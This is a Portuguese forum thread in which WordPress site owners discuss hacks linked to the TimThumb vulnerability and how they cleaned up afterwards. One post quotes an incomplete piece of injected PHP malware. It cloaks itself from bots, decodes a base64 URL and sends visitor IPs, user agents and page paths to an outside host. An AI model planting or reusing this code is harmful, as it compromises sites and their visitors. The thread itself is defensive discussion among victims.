← WordPress

Wordpress hackeado!

Lida 5264 vezes

Offline

Luís Salvador 
Membro
Mensagens 2068 Gostos 37
Feedback +4

Troféus totais: 28
Trófeus: (Ver todos)
Apple User Super Combination Combination Topic Starter Poll Voter Level 5 Level 4 Level 3 Level 2 Level 1

Eu sei que sim, por isso é que no ano passado troquei. Mas nunca é demais dizer :b
Offline

Diogo Pinto 
Administrador
Mensagens 4400 Gostos 371
Feedback +4

Troféus totais: 37
Trófeus: (Ver todos)
Avatar Search Level 6 Linux User Mobile User Super Combination Combination Topic Starter 50 Poll Votes 10 Poll Votes

Isto tem sido uma razia... sites na ptservidor e ptws em wordpress hackeados... Cheira-me a um problema no timthumb que não tinha actualizado, mas não tenho a certeza!
Offline

asturmas 
Administrador
Mensagens 19734 Gostos 50
Feedback +2

Troféus totais: 39
Trófeus: (Ver todos)
Mobile User Windows User Super Combination Combination Topic Starter 100 Poll Votes 50 Poll Votes 10 Poll Votes Poll Voter Poll Starter

Se o TimThumb não esta actualizado é essa a causa, andamos a recomendar os nossos clientes para o actualizarem desde o ano passado. http://blog.ptservidor.pt/seguranca/alerta-de-seguranca-vulnerabilidade-timthumb/

Em relação a este tópico esclareço que a PTServidor dispõe de backups integrais de todas as contas em varias localizações distintas e apesar de utilizarmos R1Soft o mesmo apenas não esta visível para os clientes devido a problemas anteriores que tivemos com clientes pelo que é preferível os clientes nos contactarem para a situação ser efectivamente resolvida e não apenas remediada com um backup.
Um backup NUNCA resolve um problema. No entanto o ataque do Diogo é diferente do que o Luis refere.
Offline

carlosm 
Membro
Mensagens 573 Gostos 10
Feedback +8

Troféus totais: 29
Trófeus: (Ver todos)
Tenth year Anniversary Nineth year Anniversary Windows User Super Combination Combination Topic Starter Poll Voter Level 5 Level 4 Level 3

Há uns tempos um blog que tinha na PTWS também foi hackeado devido a problema TimThumb.

Desde que alterei o código nunca mais tive problemas.
Offline

tartofs 
Membro
Mensagens 205 Gostos 0
Troféus totais: 28
Trófeus: (Ver todos)
Tenth year Anniversary Nineth year Anniversary Windows User Linux User Mobile User Level 5 Super Combination Combination Topic Starter Level 4

Eu tive todo o alojamento infectado nos javascript com o code eval64, na altura deve ter sido pela vulnerabilidade do TimThumb de um só blog, mas arrastou-se por todos os outros.

Resolvi com uma trabalheira imensa!!

Na semana passada foi diferente. Foram todos os index.php de todas as pastas do Wordpress e em todo os blogs. O código é algo como isto e transfere um trojan:

Código: [Seleccione]
// This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics           
        $stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink );
    }

(código incompleto)

Tive que limpar todo os ficheiros 1 a 1, mudar pass do FTP e de todos os users de admin.

A princípio pesquisem sempre em sucuri.net. Para uma pesquisa mais exaustiva, instalem o plugin Exploit Scanner e fazem uma pesquisa que ele dá todos os ficheiros infectados.

Estranho mesmo é que tenho sempre tudo actualizado e mesmo assim é raro o trimestre que não tenho uns códigos estranhos injectados.  

Sigo regularmente o blog da Sucuri e vou-me informando por lá. De referir que tenho tudo na PTServidor mas não é problema deles... é mesmo geral. E a maior parte advêm de vulnerabilidade criadas por "nós" com certos temas e plugins. É de andar sempre atento.
Offline

asturmas 
Administrador
Mensagens 19734 Gostos 50
Feedback +2

Troféus totais: 39
Trófeus: (Ver todos)
Mobile User Windows User Super Combination Combination Topic Starter 100 Poll Votes 50 Poll Votes 10 Poll Votes Poll Voter Poll Starter

Em breve um post sobre o assunto no blog do +t